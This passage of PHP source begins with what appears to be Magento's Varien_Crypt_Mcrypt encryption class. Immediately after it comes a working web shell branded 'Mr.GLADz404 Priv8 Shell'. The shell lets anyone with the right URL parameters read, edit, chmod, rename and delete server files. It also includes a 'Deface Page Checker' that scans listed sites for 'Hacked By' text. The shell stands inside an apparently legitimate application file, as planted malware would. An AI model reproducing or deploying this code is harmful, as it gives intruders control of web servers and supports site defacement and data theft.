1289.      * @param string $key cipher private key  
1290.      * @return Varien_Crypt_Mcrypt  
1291.      */  
1292.     public function init($key)  
1293.     {  
1294.         $this->handler = mcrypt_module_open(MCRYPT_BLOWFISH, '', MCRYPT_MODE_ECB, '');  
1295.         $iv = mcrypt_create_iv (mcrypt_enc_get_iv_size($this->handler), MCRYPT_RAND);  
1296.         $maxKeySize = mcrypt_enc_get_key_size($this->handler);  
1297.  
1298.         if (iconv_strlen($key, 'UTF-8')>$maxKeySize) {  
1299.             //throw new Varien_Exception('Maximum key size must should be smaller '.$maxKeySize);  
1300.             return null;  
1301.         }  
1302.  
1303.         mcrypt_generic_init($this->handler, $key, $iv);  
1304.  
1305.         return $this;  
1306.     }  
1307.  
1308.     /**  
1309.      * Encrypt data  
1310.      *  
1311.      * @param string $data source string  
1312.      * @return string  
1313.      */  
1314.     public function encrypt($data)  
1315.     {  
1316.         if (!$this->handler) {  
1317.             //throw new Varien_Exception('Crypt module is not initialized.');  
1318.             return null;  
1319.         }  
1320.         if (strlen($data) == 0) {  
1321.             return $data;  
1322.         }  
1323.         return base64_encode(mcrypt_generic($this->handler, $data));  
1324.     }  
1325.  
1326.     /**  
1327.      * Decrypt data  
1328.      *  
1329.      * @param string $data encrypted string  
1330.      * @return string  
1331.      */  
1332.     public function decrypt($data)  
1333.     {  
1334.         if (!$this->handler) {  
1335.             //throw new Varien_Exception('Crypt module is not initialized.');  
1336.             return null;  
1337.         }  
1338.         if (strlen($data) == 0) {  
1339.             return $data;  
1340.         }  
1341.         return mdecrypt_generic($this->handler, base64_decode($data));  
1342.     }  
1343.          
1344.    
1345.     /**  
1346.      * Desctruct cipher module  
1347.      *  
1348.      */  
1349.     public function __destruct()  
1350.     {  
1351.         if ($this->handler) {  
1352.             $this->_reset();  
1353.         }  
1354.     }  
1355.  
1356.     protected function _reset()  
1357.     {  
1358.         mcrypt_generic_deinit($this->handler);  
1359.         mcrypt_module_close($this->handler);  
1360.     }  
1361. }  
1362. //DEFACE PAGE CHECKER
1363. } elseif($_GET['gladz404'] == 'pepescek') {
1364. echo '<html>
1365. <head>
1366. <style type="text/css">
1367. * { margin:0;}
1368. .style1 { color: #FFFFFF;font-family: "Arial Rounded MT Bold";text-align: center;font-size: 50px; }
1369. .style2 { background: black;border: 1px solid lime;color: lime;font-size: 13px;width:650px;}
1370. .main {font-family: Palatino Linotype;font-size: 35pt;text-shadow: 0 0 6px #FF0000, 0 0 5px #FF0000, 0 0 5px #FF0000;color: #FFF}
1371. h1 span {font-size:45px;}
1372. .even {background-color: rgba(25, 25, 25, 0.8);} .odd {background-color: rgba(19, 20, 21, 0.8);}
1373. .green {color:#00FF00;font-weight:bold;} .red {color:#FF0000;font-weight:bold;}
1374. a{color:#fff;text-decoration:none;}
1375. .hid {text-align:center;background-color: rgba(8, 92, 105, 0.8);margin:0 auto;width:40%;font-weight:bold;}
1376. input[type="submit"],.box {padding:10px;background: green;color:white;font-weight:bold;} input[type="submit"]:hover {color:#fff;}
1377. .box {width:626px;border:2px solid #fff;margin:0 auto;border-top:none;}
1378. </style>
1379.  
1380. </head><br><center><font color="lime" size="6">
1381. <b>Deface Page Checker</b></font>
1382. <br><br>
1383. <form method="post" action="">
1384. <center><table class="style2"><tr><td>Site List: </td><td><textarea name="domain" cols="80" rows="10" class="style2"></textarea></td>
1385. </tr>
1386. <tr><td>Text: </td><td><input name="text" value="Hacked By ./Mr.GLADz404" size="20" class="style2"></td>
1387. </tr><tr></table>
1388. <br />
1389. <input type="submit" name="submit" value="-=[ CHECK NOW ]=-"/>
1390. </form></center><br />
1391. ';
1392. if(isset($_POST['submit'])) {
1393. $text = $_POST['text'];
1394. $items = explode("\n", trim($_POST['domain']));
1395. $items = array_unique(str_replace('http://','',$items));
1396. $total = count($items);
1397. echo '<div class="hid">Total Domains = '.$total.'</div><br />';
1398. echo '<h3 class="hid">Checking Defaced sites</h3>';
1399. echo '<table style="width:40%;margin:0 auto;">';
1400. $j = 1;
1401. $dc = 0;
1402. $sites = array();
1403. foreach($items as $s) {
1404. $data = file_get_contents('http://'.trim($s));
1405. $cond = strpos($data, $text);
1406. $cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
1407. if($cond !== false){ echo '<tr '.$cls.'><td><font color=green><a href="http://'.$s.'" target="_blank">http://'.$s.'</a></font></td><td><span class="green">DEFACED</span></td></tr>'; $sites[] = trim($s); $dc++;
1408. } else { echo '<tr '.$cls.'><td><font color=red>http://'.$s.'</font></td><td><span class="red">Failed!</span></td></tr>'; }
1409. $j++;
1410. }
1411. echo '</table><br />';
1412. $total = $dc;
1413. echo '<h3 class="hid">Total Defaced = '.$total.'</h3><br />';
1414. }
1415. echo '';
1416.  
1417. //START
1418. } elseif(isset($_GET['filesrc'])){
1419. echo "<tr><td>Current File : ";
1420. echo $_GET['filesrc'];
1421. echo '</tr></td></table><br />';
1422. echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
1423. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
1424. echo '</table><br />'.$_POST['path'].'<br /><br />';
1425. if($_POST['opt'] == 'chmod'){
1426. if(isset($_POST['perm'])){
1427. if(chmod($_POST['path'],$_POST['perm'])){
1428. echo '<font color="#FFA500">Change Permission Selesai</font><br />';
1429. }else{
1430. echo '<font color="#DA70D6">Change Permission Gagal</font><br />';
1431. }
1432. }
1433. echo '<form method="POST">
1434. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
1435. <input type="hidden" name="path" value="'.$_POST['path'].'">
1436. <input type="hidden" name="opt" value="chmod">
1437. <input type="submit" value="Go" />
1438. </form>';
1439. }elseif($_POST['opt'] == 'rename'){
1440. if(isset($_POST['newname'])){
1441. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
1442. echo '<font color="#DA70D6">Change Name Berhasil</font><br />';
1443. }else{
1444. echo '<font color="#FFEFD5">Change Name Gagal</font><br />';
1445. }
1446. $_POST['name'] = $_POST['newname'];
1447. }
1448. echo '<form method="POST">
1449. New Name : <input name="newname" type="text" size="30" value="'.$_POST['name'].'" />
1450. <input type="hidden" name="path" value="'.$_POST['path'].'">
1451. <input type="hidden" name="opt" value="rename">
1452. <input type="submit" value="Go" />
1453. </form>';
1454. }elseif($_POST['opt'] == 'edit'){
1455. if(isset($_POST['src'])){
1456. $fp = fopen($_POST['path'],'w');
1457. if(fwrite($fp,$_POST['src'])){
1458. echo '<font color="#FFEFD5">Edit File Berhasil</font><br />';
1459. }else{
1460. echo '<font color="#FFDEAD">Edit File Gagal</font><br />';
1461. }
1462. fclose($fp);
1463. }
1464. echo '<form method="POST">
1465. <textarea cols=140 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
1466. <input type="hidden" name="path" value="'.$_POST['path'].'">
1467. <input type="hidden" name="opt" value="edit">
1468. <input type="submit" value="Go" />
1469. </form>';
1470. }
1471. echo '</center>';
1472. }else{
1473. echo '</table><br /><center>';
1474. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
1475. if($_POST['type'] == 'dir'){
1476. if(rmdir($_POST['path'])){
1477. echo '<font color="00FF1E">Delete Dir Berhasil</font><br />';
1478. }else{
1479. echo '<font color="#FAFAD2">Delete Dir Gagal</font><br />';
1480. }
1481. }elseif($_POST['type'] == 'file'){
1482. if(unlink($_POST['path'])){
1483. echo '<font color="00FF22">Delete File Berhasil</font><br />';
1484. }else{
1485. echo '<font color="#ADFF2F">Delete File Gagal</font><br />';
1486. }
1487. }
1488. }
1489.        
1490. echo '</center>';
1491. $scandir = scandir($path);
1492. echo '<div id="content"><table width="1325" border="0" cellpadding="7" cellspacing="4" align="center">
1493. <tr class="first">
1494. <td><center><font color=purple>Name</font></center></td>
1495. <td><center><font color=purple>Size</font></center></td>
1496. <td><center><font color=purple>Permissions</font></center></td>
1497. <td><center><font color=purple>Options</font></center></td>
1498. </tr>';
1499.  
1500. foreach($scandir as $dir){
1501. if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
1502. echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>
1503. <a href=\"?path=$path/$dir\"><font color=#FFC900>$dir</font></a></td>
1504. <td><center><font color=blue>--</font></center></td>
1505. <td><center>";
1506.    
1507. if(is_writable("$path/$dir")) echo '<font color="green">';
1508. elseif(!is_readable("$path/$dir")) echo '<font color="red">';
1509. echo perms("$path/$dir");
1510. if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
1511.  
1512. echo "</center></td>
1513. <td><center><form method=\"POST\" action=\"?option&path=$path\">
1514. <select name=\"opt\">
1515. <option value=\"\"></option>
1516. <option value=\"delete\">Delete</option>
1517. <option value=\"chmod\">Chmod</option>
1518. <option value=\"rename\">Rename</option>
1519. </select>
1520. <input type=\"hidden\" name=\"type\" value=\"dir\">
1521. <input type=\"hidden\" name=\"name\" value=\"$dir\">
1522. <input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
1523. <input type=\"submit\" value=\">\" />
1524. </form></center></td>
1525. </tr>";
1526. }
1527. echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
1528. foreach($scandir as $file){
1529. if(!is_file("$path/$file")) continue;
1530. $size = filesize("$path/$file")/1024;
1531. $size = round($size,3);
1532. if($size >= 1024){
1533. $size = round($size/1024,2).' MB';
1534. }else{
1535. $size = $size.' KB';
1536. }
1537.  
1538. echo "<tr>
1539. <td><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='>
1540. <a href=\"?filesrc=$path/$file&path=$path\"><font color=#FFC900>$file</font></a></td>
1541. <td><center><font color=blue>".$size."</font></center></td>
1542. <td><center>";
1543. if(is_writable("$path/$file")) echo '<font color="green">';
1544. elseif(!is_readable("$path/$file")) echo '<font color="red">';
1545. echo perms("$path/$file");
1546. if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
1547. echo "</center></td>
1548. <td><center><form method=\"POST\" action=\"?option&path=$path\">
1549. <select name=\"opt\">
1550. <option value=\"\"></option>
1551. <option value=\"delete\">Delete</option>
1552. <option value=\"chmod\">Chmod</option>
1553. <option value=\"rename\">Rename</option>
1554. <option value=\"edit\">Edit</option>
1555. <option value=\"download\">Download</option>
1556. </select>
1557. <input type=\"hidden\" name=\"type\" value=\"file\">
1558. <input type=\"hidden\" name=\"name\" value=\"$file\">
1559. <input type=\"hidden\" name=\"path\" value=\"$path/$file\">
1560. <input type=\"submit\" value=\">\" />
1561. </form></center></td>
1562. </tr>";
1563. }
1564. echo '</table>
1565. </div>';
1566. }
1567. echo '<br /><center><font size=4 ; color=red> ./Mr.GLADz404 </font><font size=4 ; color=white>Priv8 Shell</font>
1568. <br><font color=red size=4>Copyright &copy; '.date("Y").' - <a href=http://www.gladz-sector.net/ target=_blank><font color=white>./Mr.GLADz404</font></a></center>
1569.  
1570. </BODY>
1571. </HTML>';
1572. function perms($file){
1573. $perms = fileperms($file);
1574.  
1575. if (($perms & 0xC000) == 0xC000) {
1576. // Socket
1577. $info = 's';
1578. } elseif (($perms & 0xA000) == 0xA000) {
1579. // Symbolic Link
1580. $info = 'l';
1581. } elseif (($perms & 0x8000) == 0x8000) {
1582. // Regular
1583. $info = '-';
1584. } elseif (($perms & 0x6000) == 0x6000) {
1585. // Block special
1586. $info = 'b';
1587. } elseif (($perms & 0x4000) == 0x4000) {
1588. // Directory
1589. $info = 'd';
1590. } elseif (($perms & 0x2000) == 0x2000) {
1591. // Character special
1592. $info = 'c';
1593. } elseif (($perms & 0x1000) == 0x1000) {
1594. // FIFO pipe
1595. $info = 'p';
1596. } else {
1597. // Unknown
1598. $info = 'u';
1599. }
1600.  
1601. // Owner
1602. $info .= (($perms & 0x0100) ? 'r' : '-');
1603. $info .= (($perms & 0x0080) ? 'w' : '-');
1604. $info .= (($perms & 0x0040) ?
1605. (($perms & 0x0800) ? 's' : 'x' ) :
1606. (($perms & 0x0800) ? 'S' : '-'));
1607.  
1608. // Group
1609. $info .= (($perms & 0x0020) ? 'r' : '-');
1610. $info .= (($perms & 0x0010) ? 'w' : '-');
1611. $info .= (($perms & 0x0008) ?
1612. (($perms & 0x0400) ? 's' : 'x' ) :
1613. (($perms & 0x0400) ? 'S' : '-'));
1614.  
1615. // World
1616. $info .= (($perms & 0x0004) ? 'r' : '-');
1617. $info .= (($perms & 0x0002) ? 'w' : '-');
1618. $info .= (($perms & 0x0001) ?
1619. (($perms & 0x0200) ? 't' : 'x' ) :
1620. (($perms & 0x0200) ? 'T' : '-'));
1621.  
1622. return $info;
1623. }
1624. ?>
1625.  
1626. <!-- --------Cursor--------- -->
1627. <style type='text/css'>body, a, a:link{cursor:url(http://4.bp.blogspot.com/-hAF7tPUnmEE/TwGR3lRH0EI/AAAAAAAAAs8/6pki22hc3NE/s1600/ass.png), default;} a:hover {cursor:url(http://3.bp.blogspot.com/-bRikgqeZx0Q/TwGR4MUEC7I/AAAAAAAAAtA/isJmS0r35Qw/s1600/pointer.png),wait;}</style>
1628. <!-------Background------------>
1629. <style type="text/css">
1630. body {
1631.         background-attachment: fixed;
1632.         background-image: url(http://cdn0.dailydot.com/cache/b7/c6/b7c6d2f8756b97422a11e3593233d27b.jpg);
1633.         background-color: black;
1634.         background-repeat: no-repeat;
1635.         background-size: 100%;
1636.         background-position: top center;
1637.         fixed transparent
1638.     }
1639. </style>